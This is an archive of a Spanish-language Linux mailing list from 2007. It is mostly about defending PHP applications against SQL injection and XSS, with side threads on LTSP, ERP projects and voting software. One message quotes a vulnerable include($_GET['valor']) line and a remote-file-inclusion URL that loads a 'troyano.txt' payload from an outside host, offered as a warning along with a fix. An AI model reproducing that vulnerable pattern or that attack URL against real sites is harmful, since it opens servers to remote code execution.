Evitar sql injection y xss

[Cristian Rodriguez]

Raul Perez escribió:
 Salud a todos
 
 Tengo mysql 5 y phpp 5 en un servidor con centos
 La pregunta es que codigo han implementado ustedes para
 asegurar sus aplicaciones en php para evitar injection de sql y xss


Ok, veamos.

Para prevenir XSS, utiliza un sistema de templates como PHPTAL,
Html_template_flexy o cualquier otro que siga la siguiente regla
elemental :

pasar por htmlspecialchars con la codificacion correcta cualquier
placeholder al que se le asignen variables a mostrar en pantalla, a no
ser que tu deliberadamente le digas lo contrario. ( esto es un sistema
de whitelist) cualquier otra forma es propensa a demasiados errores
involuntarios.

Puedes validar con expresiones regulares u otros por otras razones, pero
lo mas imporante es la forma en la cual los datos son **enviados** al
navegador, no de la forma que son recibidos, XSS mas que un problema de
input es de **output**, evita modificar,eliminar,alterar los datos
enviados por el usuario, si no corresponden al formato esperado, emite
un error, si es de formato libre, solo preocupate de que cuando estos se
muestren el navegador, este los interprete de forma segura y recuerda
que esto es valido tanto como para los datos que vienen desde usuario
como los que vienen de la DB.( si olvidas esto ultimo vas a caer en una
injeccion de segundo orden donde te atacan con los datos ya
almacenados ;) )


Para prevenir sql injection, utiliza un sistema de ORM o en su defecto
alguna biblioteca especializada como Creole, Adodb , MDB2 , PDO que
permita utilizar consultas preparadas y/o bound parameters y obliga al
programador a utilizarlas como costumbre, en todas las consultas que
utilizen variables, no importa si esas variables vienen o no vienen
directamente del usuario..cualquier otro metodo que utilizes vas en
directa picada al fracaso, porque siempre se te puede olvidar utilizar
mysql_real_escape_string() en 1 de las miles o millones de variables que
pueda tener tu aplicacion.

Ademas asegurate que tu base de datos utilize la misma codificacion de
caracteres que tu aplicacion y que el cliente que se conecta a esta
tambien, en ciertos casos puede generarse un problema de seguridad
cuando la codificacion de caracteres no coincide.

Por ultimo no utilizar addslashes() o cualquier otra funcion tuya para
 escapar los parametros de las consultas, utiliza solo las funciones
especificas y recomendadas para cada  DBMS en particular.


Espero que te sea de ayuda.

Saludos.


-- 
You don't have to burn books to destroy a culture. Just get people to
stop reading them. --Ray Bradbury

Cristian Rodríguez R.
SUSE LINUX Products GmbH
Research  Development
From [EMAIL PROTECTED]  Fri Sep 21 09:50:12 2007
From: [EMAIL PROTECTED] (marco olivares)
Date: Fri Sep 21 10:18:13 2007
Subject: OT: EDULINUX
In-Reply-To: [EMAIL PROTECTED]
References: [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

El día 20/09/07, Marcos Vargas [EMAIL PROTECTED] escribió:

 Hola

 Les cuento el escenario es el siguiente:

 Tenemos una red con un dhcp con linux y queremos colocar un LTSP
 Edulinux
 funcionando tambien en esta red, modificamos el dhcp.conf y algunas
 configuraciones de este servidor y esta funcionando, pero el problema que
 tenemos, es que no esta funcionando el mouse en las estaciones, este
 edulinux tiene un administrador grafico de estaciones, que al modificar el

tipo de mouse de la estacion no graba los cambios, por lo cual necesito
 saber el nombre y donde esta ubicado el archivo en el cual quedan grabadas
 estas modificaciones ya que graficamente no funciona.



... a mi me funciona debes seleccionar el cliente con su mac
respectiva... y presionar el boton regenar escritorioo ir a herramientas
y regenerar todos los escritorios

nota: es un servidor para el EDULINUX con su propio dhcp pero esta
 funcionando solamente con las mac de las tarjetas de las estaciones viejas


yo los uso con pxe, y con etherboot con floppy y hdd... tengo 15
estaciones...amd 450MHZ con 120 RAM.
espero te sirva...


--
 Marcos Vargas Hormazabal




-- 
Marco Rojas O.
Usuario Linux Registrado
http://counter.li.org/cgi-bin/certificate.cgi/396707
From [EMAIL PROTECTED]  Fri Sep 21 10:56:33 2007
From: [EMAIL PROTECTED] (Marcos Vargas)
Date: Fri Sep 21 10:58:57 2007
Subject: OT: EDULINUX
In-Reply-To: [EMAIL PROTECTED]
References: [EMAIL PROTECTED]
[EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

lo que pasa es que tengo 2 dhcp en mi red, el que tenia antes de instalar
EDULINUX que esta hecho en linux ademas es dominio de mi red y funciona solo
con las mac y el nuevo servidor que esta funcionando de igual manera con un
ambito especifico para que le de solo ip a las estaciones viejas y ademas
envie el LTSP a estas a traves de floppy.Al hacer estas modificaciones las
hice directamente al dhcpd.conf y al parecer el administrador de estaciones
se mareo y no graba las modificaciones para las estaciones como la tarjeta
de sonido, el mouse, etc., por lo cual necesito si alguien sabe cual 

Evitar sql injection y xss

[Claudio Salazar]

Rodrigo Fuentealba escribió:
 El 20/09/07, Raul Perez [EMAIL PROTECTED] escribió:
   
 Salud a todos

 Tengo mysql 5 y phpp 5 en un servidor con centos
 La pregunta es que codigo han implementado ustedes para
 asegurar sus aplicaciones en php para evitar injection de sql y xss
 

 Para prevenir XSS, simplemente nunca hagas algo como esto:

 ?php

include($_GET['valor']);

 ?
   
Eso es RFI ( Remote File Inclusion ), no XSS.
 Porque con eso yo podría poner una URL como:

 http://www.victima.com/index.php?valor=http://www.troyano.com/troyano.txt

 Y el código que tenga en troyano.txt se va a ejecutar en tu PC, lo quieras o 
 no.

 Una manera de impedir algo así es, en PHP 5, poner lo siguiente en tu
 archivo php.ini

 allow_url_include = Off

   
 Intente con mysql real escape string pero no se por que no me funciona

 Puedo desarrollar una funcion pero me da temor de que deje algun ueco de
 seguridad
 

 Para prevenir inyecciones SQL, no uses tus propias funciones. Mira
 ADOdb (http://adodb.sourceforge.net) y Propel
 (http://propel.phpdb.org) que son dos programas que puedes usar dentro
 de tus programas para manejar tus bases de datos, que evitan las
 inyecciones de código SQL.

 A pesar de ser más difícil, a mí me gustó más Propel que ADOdb.

   

Evitar sql injection y xss

[Rodrigo Fuentealba]

El 21/09/07, Claudio Salazar [EMAIL PROTECTED] escribió:

 Eso es RFI ( Remote File Inclusion ), no XSS.

AFAIK, RFI == una subclase de XSS. Varias de las idioteces de ese
estilo las he leido como XSS.

-- 
Rodrigo Fuentealba

Evitar sql injection y xss

[Claudio Salazar]

Cristian Rodriguez escribió:
 Claudio Salazar escribió:

   
 Lo importante para prevenir XSS es la validacion de los datos, 
 

 No, no su validacion si no que la forma en la cual son mostrados en
 pantalla.

   
Lo decia una linea despues.
 si bien se pueden crear
 funciones con expresiones regulares para detectar patrones,
 

 No, solo preocupate de **mostrarlas** con las caracteres potencialmente
 dañinos.
   
Feo output, de todas manera unas palabras mas adelante no les daba mi 
aprobacion. Lo mencione porque he visto que tambien tratan asi de evitar 
XSS.

   
 Para prevenir XSS puedes ocupar funciones como htmlspecialchars(),
 addslashes() que combinadas dan buenos resultados.
 

 que combinadas dejan la escoba ...
   
Cierto, me quedo con htmlspecialchars.
   
 Por que no te funciona mysql_real_escape_string() ?
 Solo sirve para sanitizar los datos que se ingresan en las consultas,
 antes de aplicar mysql_query().
 Mas info en
 http://www.php.net/manual/es/function.mysql-real-escape-string.php .
 


 huh ? mysql_real_escape_string() no es para prevenir XSS..
   
Hice un salto de linea para cambiar de tema, tambien mencionaba que no 
le funcionaba esa funcion y el asunto tambien trata sobre sql injection.
   
 Tambien podrias ver otras aplicaciones como ModSecurity o Core Grasp que
 añaden seguridad a aplicaciones web.
 

 Peligrosa tu recomendacion.


   
Ahora no basta con preocuparse solo de XSS e inyecciones SQL, funciones 
como mail() ya estan siendo foco de inyecciones y asi cada dia nuevas, y 
no discutiremos que es necesario que un programador debe partir por la 
seguridad de su codigo, pero una ayudita no le hace mal a nadie.
From [EMAIL PROTECTED]  Fri Sep 21 14:59:49 2007
From: [EMAIL PROTECTED] (Alvaro Herrera)
Date: Fri Sep 21 15:02:20 2007
Subject: Evitar sql injection y xss
In-Reply-To: [EMAIL PROTECTED]
References: [EMAIL PROTECTED]
[EMAIL PROTECTED] [EMAIL PROTECTED]
[EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

Claudio Salazar escribió:
 Cristian Rodriguez escribió:

 No, solo preocupate de **mostrarlas** con las caracteres potencialmente
 dañinos.

 Feo output, de todas manera unas palabras mas adelante no les daba mi 
 aprobacion. Lo mencione porque he visto que tambien tratan asi de evitar 
 XSS.

Cristian tiene razon.  Para evitar el XSS, lo que hay que hacer es
evitar que el navegador interprete el tag como si fuera HTML.  Para
esto, lo mas facil es escapar los caracteres peligrosos (creo que con
escapar el  deberia ser suficiente pero no estoy seguro).  Asi,
cualquier HTML que el atacante quiera hacer pasar por tu sitio, se veria
como un pedazo de texto en el navegador del usuario, con lo cual el
ataque deja de funcionar (por ej. si es un link, ya no es cliqueable).

-- 
Alvaro Herrerahttp://www.advogato.org/person/alvherre
El número de instalaciones de UNIX se ha elevado a 10,
y se espera que este número aumente (UPM, 1972)
From [EMAIL PROTECTED]  Fri Sep 21 15:02:59 2007
From: [EMAIL PROTECTED] (Alvaro Herrera)
Date: Fri Sep 21 15:05:25 2007
Subject: Autenticacion Centralizada
In-Reply-To: [EMAIL PROTECTED]
References: [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

Sebastian Antunez Noguera escribió:
 Estimados Listeros, en la empresa vamos a migrar el actual servidor de
 Fedora Core 7 a Redhat ES 5.
 
 Me pidieron que investigara poner un sistema de autenticacion centralizada
 donde los usuarios puedan ingresar con una password y usuario unico a las
 siguientes aplicaciones

¿Has considerado instalar un sistema Kerberos?

-- 
Alvaro Herrera   Valdivia, Chile   ICBM: S 39º 49' 18.1, W 73º 13' 56.4
Those who use electric razors are infidels destined to burn in hell while
we drink from rivers of beer, download free vids and mingle with naked
well shaved babes. (http://slashdot.org/comments.pl?sid=44793cid=4647152)
From [EMAIL PROTECTED]  Fri Sep 21 15:05:48 2007
From: [EMAIL PROTECTED] (marco olivares)
Date: Fri Sep 21 15:08:13 2007
Subject: OT: EDULINUX
In-Reply-To: [EMAIL PROTECTED]
References: [EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

El día 21/09/07, Marcos Vargas [EMAIL PROTECTED] escribió:

 lo que pasa es que tengo 2 dhcp en mi red, el que tenia antes de instalar
 EDULINUX que esta hecho en linux ademas es dominio de mi red y funciona
 solo
 con las mac y el nuevo servidor que esta funcionando de igual manera con
 un
 ambito especifico para que le de solo ip a las estaciones viejas y ademas
 envie el LTSP a estas a traves de floppy.Al hacer estas modificaciones las
 hice directamente al dhcpd.conf y al parecer el administrador de
 estaciones
 se mareo y no graba las modificaciones para las estaciones como la tarjeta
 de sonido, el mouse, etc., por lo cual necesito si alguien sabe cual es el
 archivo especifico en el cual se graban estas modificaciones para cada
 estacion como el mouse, video, audio etc.

 Muchas Gracias

 ... dentro de 

Evitar sql injection y xss

[Rodrigo Fuentealba]

El 21/09/07, Alvaro Herrera [EMAIL PROTECTED] escribió:
 Claudio Salazar escribió:
  Cristian Rodriguez escribió:

  No, solo preocupate de **mostrarlas** con las caracteres potencialmente
  dañinos.

 Cristian tiene razon.  Para evitar el XSS, lo que hay que hacer es
 evitar que el navegador interprete el tag como si fuera HTML.  Para
 esto, lo mas facil es escapar los caracteres peligrosos (creo que con
 escapar el  deberia ser suficiente pero no estoy seguro).

Si te pones a pensar en todas las posibilidades, no es suficiente.
Ponte a pensar en un trozo de código que quieres postear (pensando en
un blog, naturalmente; o en una aplicación de educación a distancia,
como una que estoy haciendo ahora).

 Asi,
 cualquier HTML que el atacante quiera hacer pasar por tu sitio, se veria
 como un pedazo de texto en el navegador del usuario, con lo cual el
 ataque deja de funcionar (por ej. si es un link, ya no es cliqueable).

IMHO, si bien tiene razón en un aspecto, en otros que son igualmente
comunes, no sirve de tanto esa forma. Generalmente para algunas
aplicaciones necesitamos guardar tags html como válidos (por ejemplo,
aplicaciones con contenido dinámico como los portales de periódicos en
línea).

Llevar un tracking de aquellos elementos que en un nombre de pila no
serían permitidos pero en el campo contenido de un blog sí lo son,
en tablas separadas horribiliza el modelo, hace más compleja la
programación y al final se me ocurren dos soluciones:

1.- Guardar el contenido del fckeditor o el tiny_mce, tal como se
genera, en la base.
2.- Generar una suerte de metalenguaje que me permita insertar
imágenes y links sin usar tags html, como {% img=imagen.jpg style=
%} o {% link=http://www.google.cl; text=Google %} (algo como el
funcionamiento de los BBCodes)

Ok, con la primera, volvemos a lo mismo, salvo que validemos todo el
resto de los datos al momento de ingresar en la base de datos; la
forma correcta de hacer las cosas es la forma más natural.

Con la segunda, difícilmente llegaremos a hacer algo realmente bueno,
por ejemplo con tablas (critíquenme por las tablas, pero que conste
que a veces necesitamos insertar datos tabulares), y el esfuerzo será
útil, pero siempre nos quedaremos cortos.

Mi idea es, lógicamente, pensando en DRY y KISS.

-- 
Rodrigo Fuentealba

desarrollo deaAplicacion grande

[Horst H. von Brand]

Graciela Urquieta [EMAIL PROTECTED] wrote:
 Hola, de principio gracias a todos por responder y dar sus
 sugerencias, a lo mejor que algunas cosas no las upe explicar bien,
 ahora detallo esas, para que tengan una idea mas clara:

 * Tengo enetendio que si se busco, para ver si existia aplicaciones
 que cumplan con los requerimientos, lastimosamente no encontraron una.
 ademas que para ir desarrollando modulos faltantes sobre alguna
 aplicacion candidata, decidieron que era preferible desarrollarla
 completa.

Tal como te dijieron antes, esto indica que no tienen la menor idea de la
cantidad de trabajo que significa desarrollar tal cosa de cero. Ve
preparando tu CV y buscando un puesto en un lugar mas civilizado...

 * Para que tengan una idea la aplicacion no solo toca aspectos
 financieros, mas alcontrario toma aspectos de control y seguimiento de
 proyectos de inversion (pagos, reversiones, etc), adquisiciones
 nacionales e internacionales, manejo de cartera para creditos a
 sectores productivos, control y seguimiento de obras financiadas por
 distintos organismos (gubernamentales, ongs, etc) y varios otros
 modulos relacionados con financiamientos a proyectos.

Se le llama ERP. Hay algunas empresitas que se dedican a ese negocio (entre
las que se cuenta la 2a empresa solo software del mercado), las opciones
completas que ofrecen parten de cerca de un palo (de los verdes). Tienen
opciones mas baratas para empresas pequen~as a medianas (escala yanqui, o
sea, lo que aca pasa por medianas-grandes a muy-muy-grandes)... si quieres
algo razonable (y OSS) en el rango chico-mediano, analiza TinyERP.

 * El tiempo previsto es de 10 meses, contatando almenos 10
 desarrolladores expertos en la herramienta, tambien se planifico una
 capcitacion  para todos los que ya trabajamos para que estemos al
 nivel de los contratados.

Arreglatelas para estar fuera de alli en 6 meses mas (porque por alli se
comenzaran a dar cuenta que les faltan 100 desarrolladores y 5 an~os para
cumplir lo que quieren, y...)
-- 
Dr. Horst H. von Brand   User #22616 counter.li.org
Departamento de InformaticaFono: +56 32 2654431
Universidad Tecnica Federico Santa Maria +56 32 2654239
Casilla 110-V, Valparaiso, Chile   Fax:  +56 32 2797513
From [EMAIL PROTECTED]  Fri Sep 21 15:55:15 2007
From: [EMAIL PROTECTED] (Horst H. von Brand)
Date: Fri Sep 21 15:57:38 2007
Subject: desarrollo deaAplicacion grande
In-Reply-To: [EMAIL PROTECTED]
References: [EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

Rodrigo Fuentealba [EMAIL PROTECTED] wrote:
 El 20/09/07, Hugo Figueroa R. [EMAIL PROTECTED] escribió:
  --- Jorge Riquelme Santana [EMAIL PROTECTED] escribió:
   Como acotación, en mi humilde opinión php no es una
   buena elección para
   desarrollar grandes aplicaciones empresariales.
 
  Seria bueno decir los motivos por que no es buena
  eleccion, experiencia propia, comparativa,
   yo creo que php5 mas un buen framework y un
  desarrollador que ocupe buenas practicas seria
  suficiente
 
 Yes sir. PHP4 más un framework que no sea tan extensible más un
 desarrollador que tenga que meterle módulos a mano, podría fácilmente
 echarse al saco un desarrollo bueno.

Eso es valido en cualquier lenguaje. Un lenguaje en el que no sea posible
cometer crimenes simplemente no es digno de usarse (Turing-completo y todo
eso).

  el unico punto en contra que veo es que en php nunca
  se han puesto de acuerdo en que framework usar como
  estandar, pero creo que si se usan los tres mas
  populares (zend, cake, symfony) se esta dando un salto
  a una posible estandarizacion.

 PHP es un lenguaje tal como C; Si los tipos que hacen C se pusieran de
 acuerdo en qué IDE utilizar,

Claro, vamos a la guerra santa vi vs emacs de nuevo...

  se está dando un salto a una posible
 estandarización, pero, ¿de qué sirve que todos los desarrolladores
 de C utilicen Anjuta, por ejemplo?.

Ninguno de los que conozco usan Anjuta...

 Los tipos de Ruby no se han puesto
 de acuerdo en utilizar a Ruby on Rails;

Igual que la gente que escribe C no se ha puesto de acuerdo en usar
gtk2. Doh...

 si yo quiero otro framework,
 puedo hacerlo (el tema es que RoR está tan extendido que sería mejor
 seguir aguas y construir aplicaciones on top of RoR).

Esa es la idea: RoR es un framework, /hecho en Ruby/. Hay otros.

 Estás viendo PHP más un Framework como un todo, cuando debes evaluar
 primero lo que te ofrece PHP como lenguaje, saber qué te sirve y qué
 te complica, saber qué problemas podrías tener con él y sólo recién
 después de eso, evaluar un Framework/CMS que te de lo necesario para
 tu aplicación. Si sólo necesitas un portal, ¿para qué complicarse la
 vida con Symfony, si puedes usar e107 o cualquiera de esas cosas?.

Disculpa, si se va a 

sistema de votacion

[Victor Hugo dos Santos]

El 21/09/07, Germán Poó-Caamaño [EMAIL PROTECTED] escribió:
 On Thu, 2007-09-20 at 16:05 -0400, Alvaro Herrera wrote:

[...]

 No era para la GUADEC, sino para la elección del Directorio de la
 Fundación GNOME.

 Una explicación general se encuentra en:
 http://www.encuentrolinux.cl/pipermail/encuentro/2006-November/000430.html

 Aunque según entiendo, lo que requiere Victor Hugo es algo más
 simple.

bueno.. ya habia leido el correo este.. y de alla salio mis dudas, ya
que en el correo, explica como funciona en teoria el sistema, pero no
emtrega datos tecnicos !!!

por ejemplo:  crearon el sistema para hacer las balotas desde la
nada o es algun sistema que ya existe y que se puede encontrar en
freshmeat ???

hay mas documentacion o alguna palabra clave para buscar en internet y
saber como podria implementarlo ???

salu2 y gracias

-- 
-- 
Victor Hugo dos Santos
Linux Counter #224399

sistema de votacion

[Germán Poó-Caamaño]

On Fri, 2007-09-21 at 16:46 -0400, Victor Hugo dos Santos wrote:
 El 21/09/07, Germán Poó-Caamaño [EMAIL PROTECTED] escribió:
  On Thu, 2007-09-20 at 16:05 -0400, Alvaro Herrera wrote:
 
 [...]
 
  No era para la GUADEC, sino para la elección del Directorio de la
  Fundación GNOME.
 
  Una explicación general se encuentra en:
  http://www.encuentrolinux.cl/pipermail/encuentro/2006-November/000430.html
 
  Aunque según entiendo, lo que requiere Victor Hugo es algo más
  simple.
 
 bueno.. ya habia leido el correo este.. y de alla salio mis dudas, ya
 que en el correo, explica como funciona en teoria el sistema, pero no
 emtrega datos tecnicos !!!
 
 por ejemplo:  crearon el sistema para hacer las balotas desde la
 nada o es algun sistema que ya existe y que se puede encontrar en
 freshmeat ???
 
 hay mas documentacion o alguna palabra clave para buscar en internet y
 saber como podria implementarlo ???

Interesante.  No había reparado en que no estaban en línea, excepto el
script de conteo de votos.

Los scripts en un inicio se encuentra en:
http://www.gnome.org/~vuntz/tmp/gfmc/

Luego, se modificaron y no logro dar con ellos. Seguramente quedaron
obsoletos con el cambio de sistema de votación y la migración de CVS
a SVN en GNOME (limpieza de por medio).

Los scripts para el Encuentro Linux puedes tomarlos desde:
http://www.gnome.org/~gpoo/hg/vote/

De allí puedes bajar un tar.gz si no tienes Mercurial.  Tiene algunas
modificaciones. De hecho, antes de subirlos los apliqué y añadí 
otras líneas para hacerlo más legible.

PS: El ChangeLog tiene algunas inconsistencias, así que no te asustes.

-- 
Germán Poó Caamaño
Concepción - Chile

Evitar sql injection y xss

[Horst H. von Brand]

Rodrigo Fuentealba [EMAIL PROTECTED] wrote:
 El 21/09/07, Alvaro Herrera [EMAIL PROTECTED] escribió:
  Claudio Salazar escribió:
   Cristian Rodriguez escribió:
 
   No, solo preocupate de **mostrarlas** con las caracteres potencialmente
   dañinos.
 
  Cristian tiene razon.  Para evitar el XSS, lo que hay que hacer es
  evitar que el navegador interprete el tag como si fuera HTML.  Para
  esto, lo mas facil es escapar los caracteres peligrosos (creo que con
  escapar el  deberia ser suficiente pero no estoy seguro).
 
 Si te pones a pensar en todas las posibilidades, no es suficiente.

Revisa http://www.dwheeler.com/secure-programs para una larga lista de
sugerencias... 

 Ponte a pensar en un trozo de código que quieres postear (pensando en
 un blog, naturalmente; o en una aplicación de educación a distancia,
 como una que estoy haciendo ahora).

Si revisas las cosas que los blogs aguantan como tags en sus comentarios,
suelen ser /muy/ limitados.

Y a que te refieres con aplicacion de educacion a distancia? De esas
cosas ya hay miles como codigo abierto... elige una, y ya.

[Por lo demas, estamos en la fase de entusiasmo debordado, implementemos!
 del ciclo de 5 an~os de esas cosas... en cosa de un an~o se daran cuenta
 (nuevamente) que no es /tan/ facil, luego pasan dos an~os para que a todos
 se les olvide el descalabro, y copmenzamos nuevamente por lo de no seria
 buena idea...]

[...]

 Llevar un tracking de aquellos elementos que en un nombre de pila no
 serían permitidos pero en el campo contenido de un blog sí lo son,

Bienvenido al mundo de se requiere validar los datos...

 en tablas separadas horribiliza el modelo, hace más compleja la
 programación y al final se me ocurren dos soluciones:
 
 1.- Guardar el contenido del fckeditor o el tiny_mce, tal como se
 genera, en la base.
 2.- Generar una suerte de metalenguaje que me permita insertar
 imágenes y links sin usar tags html, como {% img=imagen.jpg style=
 %} o {% link=http://www.google.cl; text=Google %} (algo como el
 funcionamiento de los BBCodes)

No.

Revisa como lo hacen los paquetes para blogs (http://www.geeklog.net hace
funcionar http://www.groklaw.net). La gente de http://lwn.net tiene
algo tejido en casa, que les tomo /an~os/ perfeccionar, y que no publican
porque les da verguenza lo sucio del codigo...
-- 
Dr. Horst H. von Brand   User #22616 counter.li.org
Departamento de InformaticaFono: +56 32 2654431
Universidad Tecnica Federico Santa Maria +56 32 2654239
Casilla 110-V, Valparaiso, Chile   Fax:  +56 32 2797513
From [EMAIL PROTECTED]  Fri Sep 21 22:54:34 2007
From: [EMAIL PROTECTED] (Horst H. von Brand)
Date: Fri Sep 21 22:56:58 2007
Subject: desarrollo deaAplicacion grande
In-Reply-To: [EMAIL PROTECTED]
References: [EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

Rodrigo Fuentealba [EMAIL PROTECTED] wrote:
 El 21/09/07, Horst H. von Brand [EMAIL PROTECTED] escribió:
  Graciela Urquieta [EMAIL PROTECTED] wrote:

[...]

 [ ... descripción de un ERP ... ]
 
  Se le llama ERP. Hay algunas empresitas que se dedican a ese negocio (entre
  las que se cuenta la 2a empresa solo software del mercado)
 
 SAP? Oracle? Solomon?

SAP.

  las opciones
  completas que ofrecen parten de cerca de un palo (de los verdes).
 
 Yep, es carísimo.

Y cuesta al menos un an~o de trabajo ajustar la empresa al paquete y
viceversa...

  Tienen
  opciones mas baratas para empresas pequen~as a medianas (escala yanqui, o
  sea, lo que aca pasa por medianas-grandes a muy-muy-grandes)... si quieres
  algo razonable (y OSS) en el rango chico-mediano, analiza TinyERP.

 IMHO, OpenBravo también es una buena opción; además (no conozco
 TinyERP), es viable tanto para Oracle como para PostgreSQL. Si parten
 en esa base y además necesitan aplicaciones medio no estándares,
 pueden partir por esa base de datos.

Mencione TinyERP porque esta para Fedora (y para instalarlo en un
RHEL/CentOS reciente es a lo mas tomar el SRPM y darle con rpmbuild).
-- 
Dr. Horst H. von Brand   User #22616 counter.li.org
Departamento de InformaticaFono: +56 32 2654431
Universidad Tecnica Federico Santa Maria +56 32 2654239
Casilla 110-V, Valparaiso, Chile   Fax:  +56 32 2797513